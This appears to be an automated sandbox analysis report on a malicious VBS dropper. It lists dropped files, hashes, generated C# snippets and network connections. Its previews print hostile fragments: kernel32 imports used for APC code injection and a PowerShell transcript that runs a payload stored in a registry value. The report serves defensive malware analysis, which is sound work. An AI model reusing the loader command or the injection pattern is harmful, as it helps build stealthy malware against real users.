SSDEEP:	6:V/DsYLDS81zuJ0VMRSRa+eNMjSSRr5DyBSRHq10iwHRfKFKDDVWQy:V/DTLDfue9eg5r5Xu0zH5rgQy
MD5:	216105852331C904BA5D540DE538DD4E
SHA1:	EE80274EBF645987E942277F7E0DE23B51011752
SHA-256:	408944434D89B94CE4EB33DD507CA4E0283419FA39E016A5E26F2C827825DDCC
SHA-512:	602208E375BCD655A21B2FC471C44892E26CA5BE9208B7C8EB431E27D3AAE5079A98DFFE3884A7FF9E46B24FFFC0F696CD468F09E57008A5EB5E8C4C93410B41
Malicious:	true
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class mme. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint bxtqajkpwb,uint ytemv);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr nlosdxjodm,IntPtr mvqodpevph,uint tnvcegcf,uint dbt,uint egycoak);.. }..}.

C:\Users\user\AppData\Local\Temp\iaweong2\iaweong2.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	369
Entropy (8bit):	5.209786405276214
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fhSAKLJvLVzxs7+AEszIwkn23fhSAKC:p37Lvkmb6KRfpzQRVWZEifpzQRQ
MD5:	8C77A86200603546350CECE81E98B239
SHA1:	7943F1E617BFE675E96A8FE82F6851CB546F75F4
SHA-256:	9406E0709F0FFA7DB595A8B6BED61B283323E293E2A7CA9FFE7529C6185127E7
SHA-512:	4BF58E85F9CCF3D1C749804F8694F837027DDDB2B095B9D024A676A18C2CA90876F37FF14F385D30488C3C144A02D1C2AD19579854E51D8071451BDCEEF0E74E
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\iaweong2\iaweong2.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\iaweong2\iaweong2.0.cs"

C:\Users\user\AppData\Local\Temp\iaweong2\iaweong2.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.6221973506838148
Encrypted:	false
SSDEEP:	24:etGS31WM+WEei8MTx2qHtLUyBrOOdWtGYwxhtkZfoLuEw7I+ycuZhNqakSiPNnq:63W7qMTxzJUyNnWQYwSJoLs1ulqa3uq
MD5:	6277AE817BE887BAE4104BF88A1E4EBA
SHA1:	519BAF3642EB31CF063EDBABEB2FC5882E9B4EE8
SHA-256:	1337CEADFB47789D6480AD0181373A8154D07383CA18A8D2BC530FE944332573
SHA-512:	D4FC0BA8E4ED8F27B1E22732E9E2A9C70636093E670BBC387101486E52B041986C90BF6456A3BE64B8A7DE3246AC2049B56C620475B2461BDC92C0BBF48AFF2D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....`._...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...............'...................................... 6............ H............ P.....P ......_.........e.....p.....v..........................._.!..._...!._.&..._.......+.....4.:.....6.......H.......P..................................................<Module>.iaweong2.dll.mme.W32.mscor

C:\Users\user\AppData\Local\Temp\iaweong2\iaweong2.out Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	412
Entropy (8bit):	4.871364761010112
Encrypted:	false
SSDEEP:	12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
MD5:	83B3C9D9190CE2C57B83EEE13A9719DF
SHA1:	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256:	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512:	0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious:	false
Preview:	Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\xuilsqrn\CSCD8A4030A3E546C3B2CF916F018EDC0.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.084217463585883
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryyLak7Ynqq5kPN5Dlq5J:+RI+ycuZhNYLakS5kPNnqX
MD5:	7C83BA9D10369FC8671FC453DB30E256
SHA1:	2091DFD03932E6B6ED750BC9B9D24B135A29800D
SHA-256:	8CC47F1FD7540043AAB9EEB5E32EBEFA106A7CEFC5ED2FA619C2BC2C085A37BE
SHA-512:	974F4E5B882893C03A176AEAFE025A6E0680E859115B587AC637817241A1DFC3EA4ACF53F762FD09F5769C73F11B11F564F6DEF83B4903E6F32CBDE86C915F2D
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.u.i.l.s.q.r.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...x.u.i.l.s.q.r.n...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	402
Entropy (8bit):	5.038590946267481
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJeMRSR7a1ehk1wJveJSSRa+rVSSRnA/fuHo8zy:V/DTLDfuC3jJWv9rV5nA/2IAy
MD5:	D318CFA6F0AA6A796C421A261F345F96
SHA1:	8CC7A3E861751CD586D810AB0747F9C909E7F051
SHA-256:	F0AC8098FC8D2D55052F4EA57D9B57E17A7BF211C3B51F261C8194CECB6007E2
SHA-512:	10EB4A6982093BE06F7B4C15F2898F0C7645ECD7EFA64195A9940778BCDE81CF54139B3A65A1584025948E87C37FAF699BE0B4EB5D6DFAEC41CDCC25E0E7BDA8
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class tba. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr muapoay,IntPtr ownmggmyjwj,IntPtr blggfu);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint uxd,uint egqs,IntPtr yobweqmfam);.. }..}.

C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	369
Entropy (8bit):	5.23176185506694
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23f//0zxs7+AEszIwkn23f/5:p37Lvkmb6KRfMWZEifp
MD5:	8BAF13C3E309746C713AA7817693CD43
SHA1:	48260A7C2D7D22E8BCFC2CAB9290B74EE0403469
SHA-256:	1E93899B1BB2569893A66F4BD6FFFF52014A25B40B29F3292BE9039BCC6CC01C
SHA-512:	FDABA0FC8E08AE769441B0A1A6AEB50ACE89C8E30C69BB0228133CE5A64F5411585D26CD93109E319B1775CA8E62946D9D3E7F9126EC87C509E6D48A8992354B
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.0.cs"

C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.600581399483191
Encrypted:	false
SSDEEP:	24:etGSZW/W2Dg85xL/XsB4ziL4zqhRqPPtkZf8Jn+II+ycuZhNYLakS5kPNnq:6hWb5xL/OJbuuJ89n1ulCa3Gq
MD5:	41FF6416DD014DC469F4D5FA82BEA303
SHA1:	62ABC2A9AE360ACEFE3E91173F03F6A97AAF2102
SHA-256:	B98A1E1E7C9C12F2057D0B067ABE9F7D93E6C1F40995BE919ED3B80682663E69
SHA-512:	16599A264F061D5A5C756AF5C9DC932C213611A434A8288EA47DD352097A47AEEDC5DF551BFA34E6B3E025DDC8DAA7E56716C1258EBA8184919D90C11AFC9324
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....`._...........!.................#... ...@....... ....................................@..................................#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....BSJB............v4.0.30319......l...H...#~......8...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ C............ V.....P ......a.........g.....o.....{.....................a. ...a...!.a.%...a............3./.....6.......C.......V................................................<Module>.xuilsqrn.dll.tba.W32.mscorlib.Syst

C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.out Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	412
Entropy (8bit):	4.871364761010112
Encrypted:	false
SSDEEP:	12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
MD5:	83B3C9D9190CE2C57B83EEE13A9719DF
SHA1:	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256:	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512:	0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious:	false
Preview:	Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\~DF1624FA75E6F83D1C.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	12933
Entropy (8bit):	0.4090117760705182
Encrypted:	false
SSDEEP:	12:c9lCg5/9lCgeK9l26an9l26an9l8fRDj+F9l8fRDjC9lTqDjtbembyraj3:c9lLh9lLh9lIn9lIn9loD+9loDu9lWD9
MD5:	B9AF4D56ADD9D459CC73BD2A3539D82E
SHA1:	03308A2CFDC0A945370C08E029AA63847A1725F1
SHA-256:	E302F38DFE0C598B398C02083EE65539FA651ADB7170300846D9ACBBEB7F0094
SHA-512:	C4ABB5CB54E2D211F19646255205404F37895BAA954EDDEE5FC67F6E2AC1AA79741C64BFCFF1014546D82484761C551FFE27118FE4F03AF3546AD777D2B92011
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF37BA40AC4A7503AA.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40161
Entropy (8bit):	0.6740432504962018
Encrypted:	false
SSDEEP:	384:kBqoxKAuqR+zN/2dwHuf/yrGHuf/yr9Huf/yre:5uf/yrGuf/yrRuf/yre
MD5:	4B89969483337901B04B986D02BD3C97
SHA1:	CAC54435E2B42792B7E8A50C1B33044B7AC59C5F
SHA-256:	229773E8D06146DFE13AA18575C4BB62A555A1C178E0F986F8C30248B51E3353
SHA-512:	3E96CE877520ABA3E58E74167DA6A6C2D76EE43A1B9AF3FF31853196546A4299C6FCAAFAA4E5E15CBE4E02AD52B882C703CC34A10BF74AA6A4EBB5D6864C827D
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF3BF043E2E5AE47CD.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	13189
Entropy (8bit):	0.557970530061577
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9loE9loU9lWWLTUS6PK:kBqoIv5WLTUSJ
MD5:	393321B8305B11EA46E4E5D7162AEFCB
SHA1:	6FA25F35F9739C85C6033867FD1B875F541A8F88
SHA-256:	A9B9903B3AF5C5EA254096750806C504AC21DE0B150E592DBEE40A76EB54A9CF
SHA-512:	1AEB559537E1291CC22E3BDAE17A8DFFA8316E542A0EFDD156328FB2100C01E299053474EC5086D3FEFD4F91D44306ADAF6054ABD484B1915C618DC07A9934CD
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF507B04238EE2FD71.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40153
Entropy (8bit):	0.6718513886063531
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+9DhAju+utUYYGUXF+utUYYGUXO+utUYYGUXT:kBqoxKAuqR+9DhAju+UU1+UUe+UUj
MD5:	D42BB357E3D0952BA82DE97287AC6286
SHA1:	F7B20AA414F81417BB62698F7A30C743022FC20B
SHA-256:	EC957B8DA26D7D17B0B847A9D2D048523D5726C0571CE1A0DC3EC66B1DC7AC78
SHA-512:	2FE7057366BDF073CC9E85BB437538E523737EF51DA311758A453219BFE35844FC9C6462C5F990A2AEE75CB646B52FDEEF17D3F5F7B7916C4481FFD773630C63
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF5D75D0687426FD6E.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40217
Entropy (8bit):	0.6806091502339366
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+Ks2/s9ut5w3Kut5w3tut5w3e:kBqoxKAuqR+Ks2/s9au3Kau3tau3e
MD5:	456FE41CC2D14F08E95A72506FFB4625
SHA1:	FD063DE61AD5969BB823072E60E2A15E5CD578DE
SHA-256:	233D96BA2D79B6D4C5C4C1B4D5C124CF28B7DC7B7F22CEF0E8B7A625A9011D01
SHA-512:	1D44C5C289234BC144D2FE4888E5BE32D6D23F0A866E4A55B9745D205F16F124C97446B7A366DF60CF4F3709DBC201441B14FE6BB1EB6FA1E79B303508643010
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\{FC666F93-2B96-8EB5-95F0-8FA2992433F6} Download File
Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	54
Entropy (8bit):	4.162476745088645
Encrypted:	false
SSDEEP:	3:+UUuFt1UbFHVFddBWD1UEPv:+KsbFHVKDeEX
MD5:	0C78343997853F414D35DA57E92260CE
SHA1:	4082B2850FE46BF3CF57516ACCEBDC8EE63D70B8
SHA-256:	89267508EB7F7278D62116F4D1FAE370F85F56DF8A6D9DE73B090293DCA695E0
SHA-512:	6AFC885AA621DDF1BD7CEB63ED66AA4A3AF175E0F7391995AF277C67217A1C7A7E664B713F0015F303C8224BE8864F02D655BDFA79B5D1641F6BD712D0E721C2
Malicious:	false
Preview:	24-11-2020 20:36:35 \| "0xb88d3fdf_5fa2c4f12d12f" \| 1..

C:\Users\user\Documents\20201124\PowerShell_transcript.468325.cqIz2fYX.20201124203543.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1189
Entropy (8bit):	5.3190006399502705
Encrypted:	false
SSDEEP:	24:BxSAnxy7vBZ0x2DOXUWOLCHGIYBtLWQyHjeTKKjX4CIym1ZJX/q3OLCHGIYBtcM0:BZWvj0oORF/QyqDYB1ZYFK+4ZZY+S
MD5:	B78953D232276C85BBBD506451E3C429
SHA1:	F5A50CE79F0751385E3FCD933E4F7B621584C3DC
SHA-256:	13970608E55B3FAEB1D85884E83B915C4CAF7C2BF24AFA676CBD64D21B291AF9
SHA-512:	9CD2736D7BF808CD22EE1E6760478AADC0879050C1E8101135FEA08E06A83BE1B4D468B87788EF0288F602DC35A7B6CD331D9E8BBE3EA6DBE0DCCD15CAC7177F
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20201124203544..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 468325 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))..Process ID: 5976..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20201124203544..******************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))..********************..

\Device\ConDrv Download File
Process:	C:\Windows\System32\nslookup.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	28
Entropy (8bit):	4.039148671903071
Encrypted:	false
SSDEEP:	3:U+6QlBxAN:U+7BW
MD5:	D796BA3AE0C072AA0E189083C7E8C308
SHA1:	ABB1B68758B9C2BF43018A4AEAE2F2E72B626482
SHA-256:	EF17537B7CAAB3B16493F11A099F3192D5DCD911C1E8DF0F68FE4AB6531FB43E
SHA-512:	BF497C5ACF74DE2446834E93900E92EC021FC03A7F1D3BF7453024266349CCE39C5193E64ACBBD41E3A037473A9DB6B2499540304EAD51E002EF3B747748BF36
Malicious:	false
Preview:	Non-authoritative answer:...

Static File Info

General
File type:	ASCII text, with very long lines, with CRLF, LF line terminators
Entropy (8bit):	4.2287108937994855
TrID:
File name:	0xyZ4rY0opA2.vbs
File size:	367774
MD5:	91c16c7f676eec811c3ad36e32a9dbb3
SHA1:	5395939a249782d0d6651d970f9a3af1df8924f6
SHA256:	67998bc22f994c7acb53cf98d8cf4d039a31b425f2b2f0c6d949426df05542c9
SHA512:	511aa225bc36a5210184657d2dc8d6e6d711f28402ed0337f9ea3dc08a478da34b75b9e3d59c30c33d5072ae2fa31b6b2df54c146ac1529d29f53b32affc8f27
SSDEEP:	3072:VDRp0xBRYkxWblq7iQh6qDkLBPUdgyaHoJr6OU:hqRBxIl4P6qoL5Ud/PJOOU
File Content Preview:	' Alberich Greek martial temptress presto babe, Semite rueful re fairway Estes Steinberg paratroop finesse Bangladesh authenticate allusive grapevine scattergun late, tugging gorgon Bateman inexplicable. swingy bitumen Coriolanus foreign Osaka indivisible

File Icon


Icon Hash:	e8d69ece869a9ec4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 24, 2020 20:34:41.233448029 CET	49739	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:41.233710051 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:41.510910988 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:41.511039019 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:41.512365103 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:41.515373945 CET	80	49739	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:41.515470982 CET	49739	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:41.831897020 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:42.636598110 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:42.636662960 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:42.636694908 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:42.636724949 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:42.636758089 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:42.636785984 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:42.636789083 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:42.636820078 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:42.636826038 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:42.636856079 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:42.675457954 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:42.675483942 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:42.675501108 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:42.675515890 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:42.675575018 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:42.675626993 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:42.913803101 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:42.913832903 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:42.913845062 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:42.913857937 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:42.913877010 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:42.913897038 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:42.913914919 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:42.913930893 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:42.913938046 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:42.913947105 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:42.913963079 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:42.913978100 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:42.913994074 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:42.913995028 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:42.914020061 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:42.914047956 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:42.952511072 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:42.952545881 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:42.952579975 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:42.952610970 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:42.952621937 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:42.952636003 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:42.952656031 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:42.952662945 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:42.952678919 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:42.952689886 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:42.952714920 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:42.952723026 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:42.952737093 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:42.952780962 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.191060066 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.191123009 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.191160917 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.191199064 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.191229105 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.191235065 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.191282034 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.191288948 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.191323996 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.191329956 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.191360950 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.191365004 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.191400051 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.191410065 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.191437006 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.191442966 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.191473961 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.191487074 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.191510916 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.191520929 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.191541910 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.191549063 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.191590071 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.191595078 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.191637039 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.191653013 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.191673040 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.191685915 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.191706896 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.191710949 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.191749096 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.191751957 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.191785097 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.191787004 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.191817045 CET	80	49740	47.241.19.44	192.168.2.4
